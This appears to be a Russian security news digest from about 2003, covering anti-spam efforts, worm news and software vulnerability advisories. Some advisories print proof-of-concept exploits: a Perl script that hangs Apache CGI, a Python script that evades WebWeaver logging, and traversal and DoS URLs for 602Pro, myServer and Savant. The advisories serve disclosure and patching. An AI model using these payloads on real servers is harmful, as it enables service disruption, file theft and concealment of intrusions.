В борьбе с компьютерными взломщиками американское правительство не жалеет ни денег, ни сил.

Новым антихакерским оплотом стал National Center for Supercomputing Applications, построенный в институтском городке Urbana-Champaing Университета Иллинойс.

Только на первом этапе Office of Naval Research выделил на новый проект 5,7 миллионов долларов. NCSA напичкан всевозможной аппаратурой и компьютерами; в его стенах работают лучшие умы Америки, а сердцем является мощный мейнфрейм. Отличие центра от многих подобных организаций – в его целях.

Основное направление тут – разработка средств противостояния хакерам и внедрение своих собственных методов ведения сетевого боя. Впрочем, кусать локти от страха стоит далеко не всем взломщикам.

До рядовых дефейсеров NCSA нет никакого дела – эту контору гораздо больше интересуют те, кто посягает на военные и правительственные структуры Америки. Центр стал как бы сетевой крышей для разных MILnet’ов.

Наряду с главной миссией, NCSA будет также проводить срочные исследования в области хай-тек по заказу американского правительства.
0

Последнее время много говорят об атаках на информацию, о хакерах и компьютерных взломах. Что же такое «атака на информацию»? Дать определение этому действию на самом деле очень сложно, поскольку информация, особенно в электронном виде, может быть представлена сотнями споособов. Это и отдельный файл, и база данных, и отдельная запись в ней, и целый программный комплекс. Все эти объекты могут подвергнуться — и подвергаются — атакам со стороны определенной группы лиц.

Владелец информационного объекта или уполномоченное им лицо определяют набор правил по хранению, поддержанию и предоставлению доступа к этому объекту. Умышленное нарушение этих правил классифицируется как атака на информацию. Главная тенденция, характеризующая развитие современных информационных технологий — рост числа компьютерных преступлений и связанных с ними хищений информации, а также рост материальных потерь. По результатам одного исследования, посвященного киберпреступности, за последний год от компьютерных взломов пострадало около 58% опрошенных. Из них примерно 18% заявили, что потеряли из-за нападений более миллиона долларов, а более 66% — потерпели убытки в размере 50 тыс. долларов. Свыше 22% атак были нацелены на промышленные секреты и документы, представляющие интерес для конкурентов.

Существующие стандарты и общие рекомендации в этой области страдают двумя серьезными недостатками. Во-первых, они не учитывают постоянной перестройки защищаемых систем и их окружения. Во-вторых, они не содержат практических рекомендаций по формированию режима безопасности. Информационную безопасность нельзя купить. Ее приходится ежедневно поддерживать, взаимодействуя при этом не только и не столько с компьютерами, сколько с людьми. В вопросе поддержания режима информационной безопасности особенно важны аппаратно-программные меры, поскольку основная угроза компьютерным системам исходит от самих этих систем (сбои оборудования, ошибки программного обеспечения, промахи пользователей и администраторов и т. п.). Однако абсолютной защиты не существует. Всякая защита измеряется временем взлома.
1

Украинский антивирусный центр выпустил продукт UNA v1.80 for Win32, предназначенный для борьбы с рукотворной “инфекцией”. В нем реализовано большое количество решений, которые позволили сделать работу антивируса еще более эффективной. UNA v1.80 for Win32 имеет следующие преимущества перед предыдущей версией: увеличена скорость работы, повышено качество детектирования вирусов, оптимизирована система кеширования файлов, снижен объем потребляемых системных ресурсов.

Изменения коснулись практически всех модулей. Были оптимизированы антивирусное ядро, вирусные базы; внесены изменения в модули HTMLChecker и UPDATER. Кроме того, произведены многочисленные интерфейсные изменения, которые, как надеются создатели, сделали работу с антивирусным комплексом UNA еще более приятной.

Демоверсия нового антивирусного комплекса доступна для скачивания с официального сайта Украинского антивирусного центра.

Компания Panda Software выпустила решение Panda PerimeterScan ISA Server Edition для защиты компьютеров от вредоносных кодов, которое интегрируется с Microsoft Internet Security and Acceleration (ISA) Server 2000.

Продукт Panda Software проверяет и обезвреживает входящие и исходящие файлы по протоколам Web (HTTP) и электронной почты (SMTP). Установленное как веб-фильтр и фильтр приложений, антивирусное решение Panda Software интегрируется с компонентами ISA Server: сервисами Web Proxy и Firewall.

Кроме того, это ПО включает в себя новый модуль фильтрации содержимого, позволяющий активно блокировать проникновение новых вирусов и нежелательного контента.

Panda PerimeterScan ISA Server Edition был специально разработан для тесной интеграции с ISA Server. Это решение обеспечивает надежную защиту при высокой производительности системы. Продукт включает в себя ряд новых технологических параметров, таких, как фильтрация содержимого и дополнительный модуль внутренней безопасности, а также содержит мощный механизм проверки SMTP, способный обезвреживать сжатые и вложенные файлы, и модуль внутренней безопасности для защиты от апплетов Java, элементов ActiveX и потенциально опасных скриптов.

Конференция "проблема спама и ее решения" - первые итоги.

Этот специальный выпуск электронного журнала "Спамтест" посвящен важным событиям прошедшей недели в контексте основной темы издания - борьбы со спамом.

В московском Доме Общественных Организаций 24 и 25-го сентября 2003 года прошла Первая национальная конференция "Проблема спама и ее решения".

В работе конференции приняли участие 117 зарегистрированных делегатов: системные администраторы, начальники служб безопасности и технические директора крупных компаний, представители провайдеров и публичных почтовых служб, юристы, журналисты оффлайн- и интернет-изданий. Судя по репликам и вопросам из зала - инкогнито присутствовали и представители спамеров, вполне узнаваемые по виду и позиции, которую они отстаивали в дискуссиях. Заинтересованное участие в конференции приняли и представители структур власти - Центра информационной безопасности ФСБ и Комитета по информационной безопасности Государственной Думы РФ.

С докладами выступили представители ведущих IT компаний (Microsoft, Rambler, Yandex, Ашманов и Партнеры, Mail.RU, Лаборатория Касперского, МТУ-Интел, Corbina Telecom, DATA FORT, РТКОММ.РУ, Subscribe.RU, Информзащита, ИнфосистемыДжет, Поликом Про), юрист компании "Ernst & Yang", советник аппарата Госдумы РФ по информационной безопасности. Практически каждый доклад сопровождался вопросами из зала, часто достаточно острыми, и бурными обсуждениями, которые активно продолжались в кулуарах конференции. Многие участники отмечали высокий уровень и детальность докладов, представленных ведущими экспертами в области сетевых технологий. Немало способствовала конструктивности обсуждений и теплая, неформальная обстановка, установившаяся уже с первых часов. Слушатели активно принимали участие в обсуждениях, все без исключения докладчики охотно отвечали на вопросы, продолжая дискуссии и в перерывах.

Первый день форума был посвящен социальным и юридическим аспектам проблемы борьбы со спамом, второй - техническим средствам и методам противодействия нежелательным рассылкам. Однако в ходе обсуждений эти темы неоднократно пересекались, еще и еще раз доказывая необходимость комплексных мер защиты от поразившей электронный мир чумы.

Все темы, обсуждавшиеся на конференции, можно условно разделить на три основные группы:

Определение спама.

Старые определения спама уже неактуальны, новых интернет-сообщество еще не выработало. Разночтения в этом вопросе порождают неразбериху и грозят нарушить единство межсетевого пространства. Выработать определение спама, приемлемое для большинства и вынести его на обсуждение общественности - такую задачу поставили участники конференции перед "Национальной коалицией против спама".

Борьба со спамом законодательными методами.

Обсуждались перспективы законодательных инициатив. В какие именно законы и нормативные акты необходимо внести поправки, достаточные для успешного юридического противодействия спамерам. Существуют ли в действующем законодательстве инструменты, позволяющие привлечь к ответу участников спамерского рынка. Извечный для России вопрос - "кто виноват"? На кого в первую очередь должно быть направлено копье Немезиды - на исполнителей (спамеров) или на их заказчиков (представителей различных секторов бизнеса, продвигающих свои услуги и товары "грязными" методами)?

Парадоксальная, на первый взгляд, мысль не раз прозвучала в ходе обсуждений - уже сегодня в Российском законодательстве (закон "О рекламе", закон "О связи", "Кодекс РФ об административных правонарушениях"), существуют статьи, позволяющие привлечь к ответу спамеров и/или их заказчиков. По мнению экспертов существуют и технические возможности у правоохранительных органов по установлению наиболее одиозных участников черного рынка спама. Однако за все время не был подан ни один (!) иск, позволяющий системе правосудия начать работу. Компании, несущие все более увеличивающийся ущерб от действий спамеров (а в их числе и сервера бесплатных почтовых сервисов Mail.Ru, Rambler, Яндекс, и крупные организации с тысячами сотрудников, терпящие убытки как от лишнего трафика, порождаемого спамом и спамерскими вирусными атаками, так и от потерь рабочего времени, которые в пересчете на количество работников составляют сотни тысяч долларов в год) ни разу не подали в суд на действия спамеров или их нанимателей.

Технические средства фильтрации спама.

Какими бы успешными ни были усилия в области законотворчества, уголовного или административного преследования спамеров, окончательно искоренить это явление не получится. Не случайно Илья Сегалович (Яндекс) сравнил спам с гриппом - люди издавна борются с болезнями, но тем не менее продолжают болеть. Грипп принимает все более острые и экзотические формы. Но это не значит, что нужно прекратить выпускать лекарства. Если бы не антибиотики, непоправимый ущерб могли бы нанести даже самые легкие заболевания. Поэтому особый интерес у участников вызвали доклады, посвященные методам и техническим антиспам-средствам, работающим на публичных почтовых серверах Mail.Ru, Яндекс, у провайдеров, в дата-центрах, у частных пользователей.

По итогам каждого дня конференции были проведены два круглых стола, на которых обсуждались острые вопросы:

Является ли спам вообще проблемой? Что страшнее - спам или борьба с ним?

Многие участники отмечали, что отсутствие единого подхода к определению спама и методам борьбы с ним нередко служит причиной не меньшей проблемы - нарушения целостности сети Интернет, снижения его надежности как средства доставки необходимой информации. В этой связи особенно остро стоит вопрос использования RBL-систем как источников наибольшего числа ложных срабатываний при фильтрации почты.

Сопоставим ли ущерб, наносимый спамом одним участникам рынка, с прибылью, которую получают благодаря спаму рекламирующиеся фирмы?

Не нанесет ли искоренение спама вред развитию малого бизнеса, для которого рассылки являются одним из немногих доступных средств продвижения на рынке? Еще один парадокс - несколько участников конференции узнали об этом событии и успели зарегистрироваться благодаря фальшивой рассылке с приглашением, которой спамеры за несколько дней до события пытались скомпрометировать Национальную коалицию против спама. Это еще раз показало - как бы ни был плох и неуважаем спам, но он работает, а это значит, что от такого метода предприниматели не откажутся. Тем более если учесть следующую проблему, обсуждавшуюся на круглом столе.

Низкая информированность руководителей малого бизнеса в вопросах сетевого этикета.

Многие директора рекламируемых спамом предприятий не всегда глубоко вникают в методы, которыми идет продвижение их бизнеса, доверяясь в таких вопросах рекламным агентствам, посредникам etc.

Борьба со спамом и тайна переписки.

Не является ли фильтрация нежелательной корреспонденции своеобразной перлюстрацией почты? Нет, не является - такое мнение высказал И.Ашманов. Во-первых, в антиспам-фильтрах письма анализируют роботы, во-вторых, нарушением тайны переписки является разглашение содержания письма третьим лицам, здесь уместно сравнение с работниками телеграфа, где телеграмму по роду службы читают различные служащие, подсчитывая количество слов. Но, пока они не рассказали ее содержание посторонним, нарушением тайны переписки это не является.

Кто должен принимать окончательное решение

о том, какие письма фильтровать - провайдер, публичный почтовый сервер или конечный получатель? Обсуждались юридические аспекты проблемы, возможная ответственность провайдера за случаи "ложного срабатывания" и потери деловой корреспонденции, варианты приемлемых решений. Интересной представляется формулировка Н.Н. Федотова (РТКОММ.РУ): плохо иметь плохую корпоративную политику по отношению к спаму, еще хуже - совсем ее не иметь.

Наметилась дифференциация в подходах к этому вопросу у провайдеров, предоставляющих сервис корпоративным клиентам и серверов, обслуживающих бесплатные почтовые ящики частных лиц. Если первые вырабатывают антиспам-политику в тесном взаимодействии и учитывая нужды конкретных компаний, которые являются их клиентами, то публичные почтовые сервера предпочитают придерживаться своих внутренних правил и критериев, предоставляя пользователям выбор - принять эти правила или воспользоваться услугами другого сервиса.

Обсуждение, нередко достаточно острое, всех этих вопросов подвели участников форума к следующим логичным выводам:

• Проблема спама есть, и в ближайшее время обещает стать еще более острой.
• Как и другие болезни нашего общества, проблему спама не удастся победить на все 100%.
• Несмотря на это, продолжать борьбу со спамом необходимо как в технической, так и в социальной областях.
• Это позволит снизить остроту и, по крайней мере, загнать спам в разумные рамки, снизить нагрузку и уменьшить потоки незапрашиваемой почты.
• Этого результата невозможно достичь разрозненными действиями. Необходимо объединение всех участников интернет-рынка.
• Необходимо выработать правила делового оборота, приемлемые для всех(или большинства) участников сетевого сообщества. Дать определение спама, "плохой" почты(которая может рассылаться не только людьми, но и роботами, в том числе антивирусными программами), легальных рассылок, которые все чаще стали фильтроваться спам-фильтрами различных серверов, разработка методических рекомендаций для провайдеров и сисадминов, вплоть до приложений к типовым договорам об оказании услуг.
• Малому бизнесу нужны легальные альтернативы спамерским рассылкам. Цена легальных рекламных рассылок должна существенно снизиться, составив реальную конкуренцию "мусорной почте".
• Фильтрация спама должна делаться гласно и с согласия пользователей, нормы такой "этичной" фильтрации должны быть выработаны интернет-сообществом.
• Разработкой проектов необходимых документов займется оргкомитет Национальной коалиции против спама, после чего тексты будут выложены на сайте коалиции и доступны для обсуждения всеми заинтересованными сторонами.

Уже в ходе конференции было объявлено о решении вступить в Национальную коалицию против спама еще четырех участников - компаний Data Fort, Corbina Telecom, ЗАО "Петерлинк", e-Style ISP. Намерения о вступлении высказало еще несколько крупных организаций, о чем будет объявлено позже.

На конференции была проведена лотерея, призами которой стали три годовых лицензии на "Антиспам Касперского", каждая на 100, 200 и 300 почтовых ящиков соответственно(на общую сумму 4500 евро). Сто почтовых ящиков сможет защитить от спама московская фирма ООО "БИЗНЕСЛЭНД СТАФФ" благодаря удачливости своего представителя, Сергея Крылова. Лицензия на двести почтовых ящиков уехала в Новосибирск с Андреем Минковым(ЗАО НПК КАТРЕН). И лицензия на 300 пользователей досталась Питерскому "Мегафону", который представлял Андрей Фолкин.

В скором времени материалы конференции и презентации докладчиков будут опубликованы на сайте www.spamtest.ru. Готовится также фоторепортаж, который в полной мере может отразить атмосферу конференции.

Новости недели.

Итак, господа, можно "поздравить" друг друга - сезон политического спама, о возможном всплеске которого мы говорили совсем недавно, начался. И начался с "громкого" аккорда - письмо с обвинениями в адрес мэра Москвы Ю.Лужкова. Типичный для политического пиара чернушный текст, играющий на национальных чувствах москвичей, подписан именем другого кандидата в московские градоначальники - Германа Стерлигова. Письмо направлено с анонимного адреса, ссылка с "подробностями" ведет на анонимный сайт на Народ.Ру(который уже оперативно закрыт). Невольно вспомнишь о возможностях использования спама в качестве средства "подставить" конкурента. И вновь о затронутой на конференции проблеме - никто не подает в суд на спамеров за нанесенный моральный или материальный ущерб. Долго ли так будет продолжаться?

А это уже сообщение из Питера. На прошедших в минувшие выходные выборах губернатора северной столицы зафиксированы случаи агитации избирателей при помощи SMS-спама. Были разосланы призывы голосовать против..., не опозорить Питер, разослать это сообщение друзьям и знакомым.

Еще две новости, которые не многие заметили на фоне бурных событий последней недели. NTV.RU напоминает, что российскому Интернету, точнее, его присоединению к глобальной сети исполнилось 13 лет.

Да, русскоязычная часть Интернета выросла за это время в несколько раз. Выросло и число, и масштаб проблем, захлестнувших сеть. Спам в сочетании с вирусами стал настолько опасен, что невольно печальную ностальгию вызывает известие о смерти Михаила Армалинского, писателя-эмигранта, редактора эротического журнала "General Erotic" . Как сообщает Рунет.Ру со ссылкой на Радио "Свобода", на 57 году жизни в штате Миннесотта умер писатель Михаил Армалинский. Он эмигрировал из СССР в 1976 году, но не прекращал связь с Россией с помощью Интернета. В свое время пользователи Рунета считали этого человека "спамером номер один". Хотя в сравнении с масштабами нынешних "маркетинговых акций" деятельность Михаила Армалинского, рассылавшего по сети свои эротические рассказы, выглядит не более чем невинной шалостью.

А эти известия больше похожи на сводки с линии фронта, которую все больше напоминает Интернет. С одной стороны, усиливается активность спамеров, после массированных Dos-атак которых пришлось закрыть ряд серверов RBL. С другой - все чаще мы слышим об ужесточении в разных странах мер противодействия спаму.

В Израйле, по сообщению isra.com, мировой суд Тель-Авива вынес приговор владельцу порнографического сайта выплатить штраф в размере 13 тысяч шекелей в пользу администратора сайта знакомств, у которого владелец интернетного секс-ресурса выкрал базу данных пользователей, заваливая оных в последствии рекламным "спамом" порнографической тематики.

Судья квалифицировал действия хакера, как "вторжение на чужую территорию и нарушение конфиденциальности клиентов сайта знакомств". Порнодеятель также обвинялся в том, что предпринял атаку на сайт знакомств, отправив 5 тысяч "обращений" в час, что на 3 часа вывело "жертву" из строя. По мнению суда, деяния владельца порносайта схожи по своей сути с вторжением в деловой офис, кражей документации и причинением ущерба помещению.

В США возмущенные и далеко не бедные жители штата Калифорния добились принятия закона, предусматривающего штраф US$ 1 млн. за рассылку спама. Под действие закона подпадает вся территория США, а также зарубежные страны. Это самое заметное новшество, после попытки пресечь спаммеров 500 долларовым федеральным штрафом в 1998 году.

Новый штраф может быть применен как к тому, кто рассылает спам, так и к рекламируемой компании, что вполне может привести к попыткам "подставить" конкурента. Закон вступит в силу с 1 января, сообщает 3dnews.

Некоторые источники, включая ZDNet и abcNews, опубликовали информацию о том, что система, используемая правительством США для проверки всех пользователей карт Visa на причастность к терроризму или криминальным кругам, была выведена из строя червем Welchia.

Welchia отключил системы госдепартамента консульского надзора и поддержки (CLASS), содержащие более 15 миллионов записей из различных федеральных организаций,в том числе содержащих информацию о 78000 подозреваемых террористах. Для обезвреживания компьютеров было принято решение отключить рассекреченную сеть.По этой причине ни одна трансакция visa не была проверена до возобновления действия системы.

Червь Welchia (известен также под названием Nachi.A), является вредоносным кодом, использующим брешь 'Переполнение буфера в интерфейсе RPC' для как можно более широкого распространения. Данная брешь также используется червем Blaster, который в августе стал причиной глобальной эпидемии. Blaster считается наиболее распространенным вредоносным кодом за всю историю вирусов.

За последнюю пару недель 3 самых крупных антиспамовых черных списка (Monkeys.com, Osiriusoft.com и список провайдера Compu-Net Enterprises из штата Теннесси) были закрыты в результате постоянных атак спамерами.

Понять тех, кто закрыл свои сайты (некоторые вещи не стоят проблем, которые от них получаешь) можно, но мысль о том, что спамеры могут выиграть в этом сражении, достаточно неприятна. Неизвестна детальная информация о тех трех сайтах, но все выглядит так, будто их держали энтузиасты.

Возможно пришло время какой-нибудь крупной корпорации поддержать инициативу подобных антиспамовых ресурсов. Если бы такое случилось, возможно был бы создан ресурс, который не имел бы тех недостатков, которые имеют те, что мы видим сегодня. Если правильно поставить дело (налаженный механизм распознавания спаммеров, простой способ обратиться за разбирательством и т.п.), возможно будут найдены эффективные решения проблемы.

Кто является организатором атак, достоверно неизвестно. Однако активисты по борьбе со спамом уверены, что это происки спамеров.

Прокуратура Сиэтла, штат Вашингтон, сообщила об аресте молодого человека, подозреваемого в создании модификации червя Blaster (он же Lovesan), эпидемия которого поразила интернет в августе 2003 года. Подробности о личности арестованного пока держатся в секрете. В поиске и поимке подозреваемого участвовали представители местной полиции, ФБР и Секретной службы США.

Детали расследования также держатся в секрете. Единственное, что представитель прокуратуры сообщил прессе - это то, что модификация Blaster, созданная новым подозреваемым, была предназначена для проведения DoS-атаки на сайт Microsoft Windows Update. Арестованному уже предъявлены обвинения в намеренном нанесении ущерба компьютерным системам. Наказание по этой статье может достигать десяти лет тюрьмы и штрафа в размере до 250 тысяч долларов США.

Ранее, напомним, в США и Румынии были арестованы создатели еще двух модификаций Blaster. Первым попался восемнадцатилетний американский школьник Джеффри Ли Парсон, который отказывается признавать себя виновным. Позднее румынская полиция арестовала выпускника Ясского технического университета, создавшего относительно малораспространенную модификацию червя под названием Blaster.F. Создатель же оригинального варианта Blaster по-прежнему гуляет на свободе.

Программа: Invision Power Board 1.1.1 Опасность: Низкая Наличие эксплоита: Не нужен Описание: Уязвимость в разрешениях файлов обнаружена в Invision Power Board. Локальный пользователь может изменять глобальный файл конфигурации. На Linux/UNIX системах, локальный пользователь может перезаписать или изменить 'conf_global.php' файл. Этот файл включается во всех разделах форума. Код, содержащийся в этом файле, будет выполнен когда целевой пользователь просматривает любой раздел форума. В результате локальный пользователь может добавить произвольные PHP команды в файл, которые затем будут выполнены с привилегиями процесса Web сервера. Локальный пользователь может также внедрить произвольный код сценария, который будет выполнен в браузере целевого пользователя. URL производителя:http://www.invisionboard.com/ Решение: Измените разрешения 'conf_global.php' файла.

Invision Power Board Vul

Программа: Savant Web Server 3.x

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Savant Web Server. Злонамеренный пользователь может вызвать отказ в обслуживании.

Уязвимость связанна с ошибкой обработки некоторых HTTP GET запросов. Специально обработанный запрос может заставить сервер перенаправить запрос на страницу по умолчанию, что приведет к бесконечному циклу и работа программы аварийно завершиться через некоторое время. Пример:

http://[victim]/%x

URL производителя: http://savant.sourceforge.net

Решение: Фильтруйте злонамеренные символы в HTTP прокси или на межсетевой защите.

Программа: myServer 0.4.3 Опасность: Наличие эксплоита: Да Описание: Уязвимость обхода каталога обнаружена в myServer. Удаленный пользователь может просматривать произвольные файлы на системе с привилегиями процесса Web сервера. Удаленный пользователь может представить специально обработанный URL, состоящий из комбинации символов обхода каталога, чтобы просматривать произвольные файлы на системе пользователя. Несколько примеров: /././. /././././. /././././././. /././././././././. URL производителя:http://myserverweb.sourceforge.net/ Решение:Установите обновленную версию программы (0.5): http://sourceforge.net/project/showfiles.php?group_id=63119

myServer 0.4.3 Directory Traversal Vulnerability

Операционная система: Debian GNU/Linux unstable alias sid, Debian GNU/Linux 3.0

Опасность: Низкая

Описание: Debian обновил пакет marbles. Устраненная уязвимость позволяет локальному пользователю получить поднятые привилегии на системе.

Уязвимость связанна с неправильной проверкой границ при обработке HOME переменной окружения. В результате локальный пользователь может выполнить произвольный код с привилегиями группы GAME.

URL производителя: http://security.debian.org/

Решение: Обновите пакеты:

Debian GNU/Linux 3.0 alias woody --

Source archives:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1.dsc
Size/MD5 checksum: 639 245bdf77bd4bd8486c6b5f3959cb60b3
http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1.diff.gz
Size/MD5 checksum: 6555 e961bb7403e459ce364b0687d0820269
http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2.orig.tar.gz
Size/MD5 checksum: 798960 33d85d3b201eadf2da75522fef7a9f18

Alpha architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_alpha.deb
Size/MD5 checksum: 810666 2cc6147dd9f7bb2bda5cbf028a5a6140

ARM architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_arm.deb
Size/MD5 checksum: 795756 5e376a3686f47c3e9f807dd2d561bbc8

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_i386.deb
Size/MD5 checksum: 791310 9d24587b577fd87dad5692e8047a410a

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_ia64.deb
Size/MD5 checksum: 825452 9612573fe33cf864ef555b2768f9482c

HP Precision architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_hppa.deb
Size/MD5 checksum: 802686 1c19d173e8099b2dac59e3a8a7811c99

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_m68k.deb
Size/MD5 checksum: 790122 2764f5703c05c5a8aa08da904b35e3eb

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_mips.deb
Size/MD5 checksum: 799582 769ecd91c03047b7dd49f7de01eb211e

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_mipsel.deb
Size/MD5 checksum: 799440 c608d603b5bb7a97f178c3270536d01d

PowerPC architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_powerpc.deb
Size/MD5 checksum: 795932 f70c6781b0c606014ff699e1afedae94

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_s390.deb
Size/MD5 checksum: 793942 6e666436a5fdc933c7a73f96e82468bb

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/m/marbles/marbles_1.0.2-1woody1_sparc.deb
Size/MD5 checksum: 794888 a5e518028cf16dcfcdfdef2f4ad90856

Программа: Apache Web Server 2.0.47 и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Apache Web сервере в mod_cgi. Удаленный пользователь, способный положить CGI сценарий на сервер, может нарушить работу Web сервера. CGI сценарий, который генерирует более 4k исходящих данных к STDERR, приведет к приостановке работы CGI сценария. При этом Apache httpd процесс зависнет в ожидании дополнительных данных из CGI процесса, из-за блокирования функционального запроса write() в mod_cgi. Пример/Эксплоит: #!/usr/bin/perl # 24x170 = 4080 bytes to stderr foreach my $x (1..24) { print STDERR 'X' x 169 . "\n"; } # + 17 more bytes, putting us at 4097 # Delete one char from the print below to make # it work again print STDERR "0123456789ABCDEF\n"; # Our actual script output, which never comes print "Content-type: text/plain\n\nASDF\n"; URL производителя: http://nagoya.apache.org/bugzilla/show_bug.cgi?id=22030 Решение: Производитель выпустил обновленную версию mod_cgi.c, доступную в Apache 2.1 CVS repository.

4097+ bytes of stderr from cgi script causes script to hang

Программа: MPlayer 0.90-0.91, 1.0pre1 Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в MPlayer. Злонамеренный пользователь может скомпрометировать систему пользователя. Уязвимость связанна с недостаточной проверкой границ при обработке ASX заголовков. В результате удаленный пользователь может представить мультимедийный файл со специально обработанным ASX заголовком, чтобы вызвать переполнение буфера и выполнить произвольный код на системе пользователя. URL производителя:http://mp.dev.hu/ Решение: Установите соответствующее обновление: http://mp.dev.hu/MPlayer/patches/vuln01-fix.diff

Exploitable remote buffer overflow vulnerability in MPlayer

Программа: BRS WebWeaver 1.x Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в BRS WebWeaver. Удаленный атакующий может выполнить HTTP запрос, в котором не будет зарегистрирован IP адрес. WebWeaver 1.06 и, вероятно, предыдущие версии, позволяет анонимный серфинг' при помощи некоторого трюка. Если HTTP Host' заголовок в HTTP запросе к серверу будет лишком длинным, то Webweaver не запишет ваш адрес IP в лог-файл: HTTP Server Started - 24/Sep/2003:18:13:39 10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-" 10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-" - - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-" - - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-" - - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-" Ответ сервера HTTP: HTTP/1.0 414 Request-URI Too Large Sever: BRS WebWeaver/1.06 Date: Wed, 24 Sep 2003 14:16:11 GMT Content-Type: text/html <HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request -URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi s server.</BODY></HTML> Пример/Эксплоит: #! /usr/bin/env python ## # by euronymous [ http://f0kp.iplus.ru ] # # Usage: ./WWanon.py <target_host> ## import sys, socket H0ST = sys.argv[1] BUF = 'fp' * 0x815F f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) f.connect((H0ST,80)) f.send('GET / HTTP/1.1\r\n') f.send('Host: '+BUF+'\n\n') WWout = f.recv(1024) f.close() print WWout URL производителя:http://www.brswebweaver.com/ Решение:Регистрируйте запросы другими способами (firewall, IDS)

BRS WebWeaver: Анонимный серфинг

Программа: 602Pro LAN Suite 2003.0.3.0828 Опасность: Средняя Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в прокси сервере 602Pro LAN Suite. Удаленный авторизованный пользователь может просматривать произвольные файлы на системе. Удаленный авторизованный пользователь может получить информацию об Webmail пользователях. Программное обеспечение не проверяет правильность 'GetFile' запросов в сценарии m602cl3w.exe. В результате удаленный авторизованный пользователь может просматривать произвольные файлы (в т.ч. почтовые сообщения других пользователей) на системе с привилегиями Web сервера. Пример/Эксплоит: http://[target]/mail/m602cl3w.exe?A=GetFile&U=7921604D7A587937986E24242C0588&DL=0& FN=./././boot.ini В параметре U представлен ID удаленного авторизованного пользователя. URL производителя:http://www.software602.com/ Решение: Установите соответствующее обновление: http://download3.software602.com/ls2003.exe

602Pro Lansuite 2003 - Multiple Vulnerabilities

Программа: Gnome 2.0

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Gnome desktop в XScreenSaver поставляемом с Sun Solaris. Некоторые пользователи не могут заблокировать экран.

Sun предупреждает, что root пользователь использующий GNOME desktop не может заблокировать экран через XScreenSaver.

URL производителя: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56720

Решение: Sun рекомендует использовать xlock(1) из командной строки или установить соответствующие обновления для GNOME 2.0.

Программа: sbox 1.04 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в sbox. Удаленный пользователь может раскрыть информацию об инсталляционном пути и пользовательском пути. Удаленный пользователь может представить HTTP запрос для несуществующего сценария в '/cgi-bin' каталоге, чтобы заставить сервер отобразить инсталляционный путь. Пример: http://[target]/cgi-bin/non-existent.pl Sbox Error Stat failed. /home/jcf/cgi-bin/a.pl: No such file or directory URL производителя: http://stein.cshl.org/WWW/software/sbox/ Решение: Отредактируйте исходный код таким образом, чтобы программа не отображала инсталляционный путь.

EORF2003-04: sbox path disclosure problem

Три интернет-сайта, публикующие списки рассыльщиков спама, были вынуждены приостановить свою работу после спланированной и произведенной атаки в сети.

В интернете разгорелась нешуточная борьба между спамерами и серверами, публикующими "черные списки" компаний, рассылающих уйму непрошеных рекламных объявлений. "Это определенно означает эскалацию спамовых войн. До этого война велась партизанскими методами ... Сейчас спамеры впервые применили столь нахальную тактику", - сказал Эндрю Барретт, исполнительный директор регулирующего антиспамового органа Spamcon Foundation.

От массированной атаки, организованной спамерами, пострадали сайты, которые помогают системным администраторам и провайдерам интернет-услуг фильтровать электронную почту. Они публикуют списки серверов и отдельных адресов, откуда может прийти электронный мусор.

Программа: Cfengine 2.0.7 и более ранние версии. Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Cfengine. Удаленный пользователь может выполнить произвольный код на уязвимом сервере. Удаленный пользователь может вызвать переполнение буфера, посылая более 4096 байт к 5308 tcp порту на сервере (cfservd daemon). Уязвимость может использоваться для выполнения произвольного кода. Для успешной эксплуатации уязвимости, хост атакующего должен присутствовать в списках управления доступом к этому порту. URL производителя:http://www.bykov.dp.ua/cfengine/ Решение: Установите последнюю версию программы (2.0.8): http://www.cfengine.org/mirrors.html

Cfengine2 cfservd remote stack overflow

